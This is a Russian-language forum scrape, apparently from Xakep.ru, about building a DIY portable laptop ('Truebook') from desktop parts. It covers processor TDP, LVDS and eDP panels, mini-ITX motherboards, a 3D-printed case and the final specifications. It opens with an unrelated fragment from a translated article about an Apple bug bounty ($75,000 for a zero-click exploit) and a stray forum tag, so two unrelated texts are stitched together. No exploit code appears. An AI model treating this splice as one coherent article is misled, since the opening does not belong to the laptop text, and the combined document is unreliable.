Я сообщил об этой ошибке Apple в соответствии с правилами программы Security Bounty и использовал BugPoC для демонстрации. Apple посчитала, что этот эксплойт попадет в категорию «Сетевая атака без взаимодействия с пользователем: несанкционированный доступ к конфиденциальным данным Zero- Click» и присудил мне 75 000 долларов.

Spoiler: Информация

Перевод статьи от Joynses
Источник

Спасибо за внимание![/CLIKE]

Ты решил приобрести производительный портативный компьютер, но смотришь на цены и печалишься: мощь и портативность одновременно — дорогое удовольствие. В этой статье я расскажу, как собрать портативный лэптоп из стандартных десктопных комплектующих своими руками, а также в чем плюсы такого подхода. Свое детище я назвал Truebook.

Почему нельзя просто купить мощный ноутбук?
Для начала — в ноутбуки устанавливают мобильные процессоры с урезанным TDP.

TDP (Thermal Design Power) — это конструктивные требования к теплоотводу. Эта величина показывает максимальное количество тепла, которое должна рассеивать система охлаждения чипа.

Производители принимают величину TDP равной максимальной мощности, которую потребляет чип. Потребляемую мощность проще измерить, и в конце концов вся она будет рассеяна в виде тепла.

Показатель TDP не равен энергопотреблению, хотя и связан с ним. В большинстве случаев процессор с более высоким значением TDP потребляет энергию (и выделяет тепло) сильнее, чем с меньшим, но это справедливо при сравнении продукции одного производителя, например Intel или AMD. Бывает, что чип AMD с заявленной мощностью в 95 Вт экономичнее, чем Intel с 90 Вт.

Давай сравним характеристики нескольких мобильных и десктопных процессоров компании Intel. Возьмем процессор i5-2500, который используется в настольных компах, и i5-2557M для ноутбуков.

Сравнивать мы будем на сайте компании Intel. Как видишь, расчетная мощность — она же TDP — у этих процессоров сильно отличается. У мобильного i5-2557M она равна 17 Вт, а у десктопного i5-2500 — целых 95 Вт.

Не зря инженеры занижают основные параметры процессоров: количество ядер, частоту процессора. Это позволяет добиться снижения TDP. Охлаждать процессор в тонком корпусе ноутбука станет намного проще.

В заводских ноутбуках меня не устраивают не только слабые процессоры, но и ограниченные возможности апгрейдить железо. Конечно, в более дорогих игровых ноутбуках можно обновить процессор, твердотельный накопитель, оперативную память и даже дискретную видеокарту, но зачастую лишь в пределах одного поколения процессоров. Не исключено, что через несколько лет твой ноутбук устареет и ты ничего не сможешь с этим поделать.

Еще один недостаток заводских ноутбуков — матрица расположена на фиксированном расстоянии от клавиатуры, и это можно исправить, только подключив внешний монитор или клавиатуру.

Все это привело меня к мысли собрать собственный ноутбук. Пусть он не будет особенно тонким, достаточно, чтобы можно было перевозить его с места на место без особого труда.

Подбор комплектующих
Я поставил перед собой три основные цели.

1. Возможность полного апгрейда всех компонентов.
2. Использование десктопных комплектующих.
3. Поддержка стандартных комплектующих (материнских плат, матриц).

Поговорим о выборе каждого из компонентов.

Матрица
Поскольку гаджет планируется довольно мобильным, я решил, что матрица должна быть ноутбучной. В ноутах используются матрицы с разными типами разъемов. Рассмотрим основные.

• Интерфейс LVDS — один из самых распространенных интерфейсов среди всех, что используются в мониторах настольного типа и в матрицах для ноутбуков. Интерфейс LVDS обеспечивает более высокую пропускную способность, чем TMDS, поэтому LVDS фактически стал стандартом внешнего интерфейса для современной панели LCD.
• LVDS (TIA/EIA-644) — Low Voltage Differential Signaling — это дифференциальный интерфейс для скоростной передачи данных. Он разработан фирмой National Semiconductor в 1994 году.
• eDP (Embedded DisplayPort) — встроенный порт дисплея. Организация VESA признаёт его как стандарт.

Несмотря на полную совместимость цифрового сигнала с внешним DisplayPort, eDP дополнен функциями для использования внутри устройств (электропитание дисплея, частота, уровень подсветки, управление буфером Panel Self-refresh).

Panel Self- refresh — технология, с помощью которой дисплей отображает картинку, когда нет видеосигнала, и меняет ее по требованию графического процессора.

Еще eDP поддерживает интеграцию в видеосигнал дополнительных цифровых пакетов, что позволяет реализовать на плате дисплея другие интерфейсы. Например, можно добавить микрофон, веб-камеру, тач-поверхность, хаб USB. Это позволяет снизить количество проводников в шлейфе для подключения к системной плате и сократить стоимость деталей и обслуживания.

В отличие от LVDS в eDP снижено общее количество линий, необходимых для передачи данных. И всё без потери качества и с контролем четкости!

В ближайшие несколько лет, думаю, стандарт eDP вытеснит с рынка устаревший LVDS. Для наглядности приведу таблицу сравнения технических характеристик интерфейсов.
Сравнение LVDS и eDP

Матрицы Full HD на интерфейсе eDP по цене намного ниже, чем c поддержкой LVDS. Это тоже необходимо учитывать, но для меня выбор оказался не так прост.

А пока что я остановился на диагонали матрицы 15,6 дюйма.

Материнская плата
Основные форм-факторы материнских плат

Теперь необходимо выбрать материнскую плату. Именно она будет диктовать свои правила поддержки (или ее отсутствия) интерфейсных и прочих не менее важных разъемов.

Чтобы выбрать материнскую плату, нужно определиться с ее форм-фактором. Лучше всего к пятнадцатидюймовой матрице подходят форматы mini-ITX, Mini-STX и thin mini-ITX.

• Mini-ITX подразумевает материнскую плату с размерами 170 × 170 мм и поддержкой десктопной ОЗУ. На таких платах есть 24-пиновый разъем питания от стандартного блока питания ATX, а высота интерфейсных разъемов составляет около 4 см.
• Mini-STX — довольно новый форм-фактор материнских плат. Существенно меньше по размеру, чем mini-ITX, — 147 × 140 мм. К преимуществам можно отнести и питание от внешнего блока питания 19 В. Недостаток: слоты оперативной памяти расположены вертикально относительно платы, разъемы на задней панели сделаны в два ряда, что увеличивает ее размеры. Их, конечно, можно выпаять, но это противоречит изначальным требованиям к универсальности.
• Thin mini-ITX — размер 170 × 170 мм, как и у mini-ITX. Но в отличие от нее высота здесь — в один интерфейсный разъем. К тому же такая плата может питаться от внешнего блока питания 19 В. Мой выбор пал на материнскую плату ASRock H110TM-ITX R2.0.

ASRock H110TM-ITX R2.0
Одна из самых важных опций — должен быть разъем LVDS для подключения матрицы.

Все остальное
Поскольку на выбранной материнской плате в наличии был только разъем LVDS 40pin, то и матрицу я решил взять c таким же разъемом. Остановился я на матрице Innolux N156B6-L0B c диагональю 15,6 дюйма.

К процессору требований у меня было меньше: лишь бы работал и был мощнее мобильных.

Оперативная память — планка SO-DIMM DDR4, накопитель — SSD Sata M2 120 Гбайт.

Для первой тестовой сборки этого хватило.

Кулер для процессора
Я изучил варианты сначала в местных магазинах, а позже — на «Алиэкспрессе», но так и не нашел ничего подходящего.

В найденных вариантах меня не устраивало расположение радиатора и изгиб тепловых трубок — я собирался поместить материнскую плату в корпусе таким образом, чтобы, во-первых, разъемы были по правую сторону от пользователя, а во-вторых, процессор располагался бы ближе к верхней грани устройства. Так охлаждение будет более эффективным.

В итоге мой выбор пал на процессорный кулер Intel, модель [BXHTS1155LP](https://market.yandex.ru/product--kuler-dlia-protsessora-intel- bxhts1155lp/8456141).

Intel BXHTS1155LP


Шлейф LVDS для соединения матрицы ноутбука и материнской платы
Изначально я предположил, что этот шлейф можно позаимствовать у ноутбука с идентичным разъемом LVDS. Я работал в сервисе, и через мои руки ежедневно проходило множество ноутбуков, но меня постигло разочарование. Прошло три года, прежде чем я нашел подходящий мне по распиновке шлейф LVDS.

Когда все комплектующие были у меня, я принялся за моделирование корпуса.

Создание макета
Изначально корпус задумывался в форме классического ноутбука: нижняя часть с клавиатурой и основными комплектующими — материнской платой, накопителем и прочим, а верхняя — с матрицей и веб-камерой. Соединялись бы части с помощью петель.

Далее были разработаны и подготовлены трехмерные модели для этого варианта корпуса. Я планировал сделать его из металла.

Модель нижней части корпуса из листового металла с отверстиями в основании для крепления материнской платы, перфорированными отверстиями для вентиляции на передней грани. Сзади расположены площадки для крепления петель матрицы.

Другая сборная модель нижней части корпуса с перфорациями для забора воздуха на передней грани и креплением для петель матрицы — на задней.

Модель верхней крышки для нижней части корпуса представляет собой листовой металл с перфорациями для встроенных динамиков и выемку для съемной беспроводной клавиатуры.

В процессе я понял, что нужно полностью перерабатывать и упрощать модель корпуса: уменьшить корпусные детали и сократить подвижные узлы.

Новая конструкция получилась довольно простой и легкой в изготовлении: две основные пластиковые части, верхнюю и нижнюю, крепим к основанию из алюминия, на него также прикрепляются все основные комплектующие, а сверху кладем в пазы матрицу и также накрываем крышкой из листового металла. По бокам, слева и справа, располагаются интерфейсные разъемы, которые также прикрываем накладками.

Накладки

На верхней пластиковой части должна быть перфорация, которая занимает 80% места задней грани, на остальных 20% расположены два отверстия для съемных антенн Wi-Fi, чтобы без проблем можно было установить направленную антенну.

На нижней части по краям устроены перфорации для забора свежего воздуха, на верхней грани по краям — перфорации и крепления для двух динамиков, а по центру — отверстие под кнопку диаметром 12 мм для включения и отключения экрана.

Задняя грань верхней части

Передняя грань нижней части

Вид снизу

Пластиковые части я изготовил на 3D-принтере, а металлические вырезал из листовой стали и алюминия.

Сборка

Корпус
Когда у меня на руках были пластиковые детали корпуса, оставалось их обработать вручную: удалить поддержки, выровнять углы, вклеить резьбовые вставки M3, чтобы закреплять на них остальные части корпуса. Затем я последовательно примерял комплектующие и подпиливал напильником все, что плохо стыковалось.

Примерка боковых интерфейсных разъемов

Примерка боковых интерфейсных разъемов и верхней крышки

Примерка материнской платы

Изготовлен и установлен на свое место воздуховод для быстрого вывода горячего воздуха из корпуса

Примерка воздуховода и кулера — выставлены идеально!

Примерка накладок для боковых интерфейсных разъемов

Примерка накладок для боковых интерфейсных разъемов

Примерка матрицы

После того как я убедился в полной совместимости всех корпусных частей и комплектующих, корпус был отправлен на порошковую покраску.
Корпусные части после порошковой покраски

Железо
Далее — первоначальная сборка железа в корпус. Заняла около девяти часов.

Для питания устройства я выбрал защищенный от влаги разъем с защелкой, который подпаял к блоку питания от ноутбука.

Следующий этап — пайка проводов для кнопок и разъемов USB. Также я подключил картридер для карт памяти microSD.

Вот что получилось в итоге.


Итоговая конфигурация устройства

• Процессор: Intel Pentium G4400
• Диагональ матрицы: 15,6 дюйма
• Оперативная память: 4 Гбайт DDR4
• Накопитель: SSD на 128 Гбайт
• Адаптеры беспроводных сетей: AC 9260NGW 802.11a/b/g/n/ac, Bluetooth 5.0
• Картридер: microSD
• Масса: 3 кг
• Размеры: 380 × 240 × 38 мм

Выводы
На этом работа пока что закончена, но простор для улучшений здесь огромный.

Во-первых, в соответствии с задумкой в моем «Трубуке» можно апгрейдить практически все, начиная с матрицы и заканчивая антенной Wi-Fi или батареей. При желании можно даже полностью сменить платформу, заменив материнскую плату и процессор.

Во-вторых, можно усовершенствовать и дизайн, не меняя основные комплектующие. Например, уменьшить габариты корпуса за счет использования slim-матрицы и более плотной компоновки комплектующих.

Если ты захочешь повторить мой проект или модернизировать его, то 3D-модели, чертежи и комплектующие качай по ссылке. Большую часть компонентов можно найти на AliExpress.

WWW

• Адаптер Wi-Fi
• Тачскрин 15,6"
• Беспроводная slim Bluetooth-клавиатура
• Кнопка включения
• Механическая беспроводная Bluetooth-клавиатура
• Веб-камера
• Контроллер заряда батареи
• Аккумуляторы 18650
• LVDS-шлейф
• Динамики
• Разъем питания
• Кнопка 12 мм
• Разъемы USB и аудио
• Продвинутый контроллер заряда батареи openUPS
• Интересные материнские платы

Автор @ Jaw
хакер.ру